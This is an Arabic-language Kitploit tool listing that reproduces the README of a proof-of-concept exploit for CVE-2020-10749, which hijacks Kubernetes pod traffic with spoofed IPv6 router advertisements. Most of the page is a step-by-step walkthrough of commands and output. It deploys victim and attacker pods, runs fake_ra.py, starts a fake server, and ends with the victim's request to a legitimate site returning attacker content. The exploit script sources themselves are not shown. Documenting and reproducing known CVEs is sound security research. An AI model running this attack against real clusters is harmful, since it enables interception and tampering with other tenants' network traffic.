Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-10749 — استغلال إثبات المفهوم لثغرة CVE-2020-10749 يوضح هجمات الوسيط (MitM) في Kubernetes عبر إعلانات الموجهات الخادعة لبروتوكول IPv6 بين البودات. | Kitploit
أدوات/GitHubGitHub/knqyf263/cve-2020-10749
أمن الحاوياتالاستغلالاستغلال تطبيقات الويبأمن الشبكاتأمن السحابة
GitHubknqyf263/cve-2020-10749

CVE-2020-10749

استغلال إثبات المفهوم لثغرة CVE-2020-10749 يوضح هجمات الوسيط (MitM) في Kubernetes عبر إعلانات الموجهات الخادعة لبروتوكول IPv6 بين البودات.

عرض المستودع
251410منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-10749

CVE-2020-10749 PoC (هجمات MitM على Kubernetes عبر رسائل إعلان موجه مزيفة IPv6)

لأغراض تعليمية فقط

demo

المتطلبات

  • مجموعة Kubernetes مع إصدار kubelet التالي
    • kubelet v1.18.0-v1.18.3
    • kubelet v1.17.0-v1.17.6
    • kubelet < v1.16.11

الاستغلال

نشر Pod الضحية

$ kubectl apply -f victim/victim.yml
$  kubectl ge pods
NAME                       READY   STATUS    RESTARTS   AGE
victim-5484d9f977-pgtnh    1/1     Running   0          10s
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # apk add curl
/ # ip -6 a show eth0
3: eth0@if25: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1450 state UP
    inet6 fe80::3c07:afff:feb5:7219/64 scope link
        valid_lft forever preferred_lft forever
/ # ip -6 route
fe80::/64 dev eth0  metric 256
ff00::/8 dev eth0  metric 256
$ curl http://example.com

نشر Pod المهاجم

$ kubectl apply -f attacker/attacker.yml
$ kubectl get pods
NAME                       READY   STATUS    RESTARTS   AGE
attacker-8857dd5c9-pnzjw   1/1     Running   0          50s
victim-5484d9f977-pgtnh    1/1     Running   0          10s

إرسال رسالة إعلان موجه مزيفة

$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # ip a show eth0 | grep "link/ether" | awk '{print $2}'
aa:ca:d1:91:8f:23
/ # sed -i 's/\[YOUR_MAC_ADDR\]/aa:ca:d1:91:8f:23/g' fake_ra.py
/ # python fake_ra.py
Sending a fake router advertisement message...
.
Sent 1 packets.

تشغيل خادم مزيف

$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # python server.py
Listening...

الوصول إلى موقع ويب شرعي

تأكد من إضافة عنوان IPv6 جديد والبوابة الافتراضية.

$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # ip -6 a show eth0
3: eth0@if27: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1450 state UP
    inet6 2001:db8:1:0:1854:9aff:fe75:2368/64 scope global dynamic
           valid_lft forever preferred_lft forever
               inet6 fe80::1854:9aff:fe75:2368/64 scope link
                      valid_lft forever preferred_lft forever
/ # ip -6 route
2001:db8:1::/64 dev eth0  metric 256
fe80::/64 dev eth0  metric 256
default via fe80::42:fcff:dead:beef dev eth0  metric 1024  expires 0sec
ff00::/8 dev eth0  metric 256
/ # curl http://example.com
malicious!!!!!!!

المرجع

  • https://github.com/kubernetes/kubernetes/issues/91507

المؤلف

Teppei Fukuda

تنزيل الأداة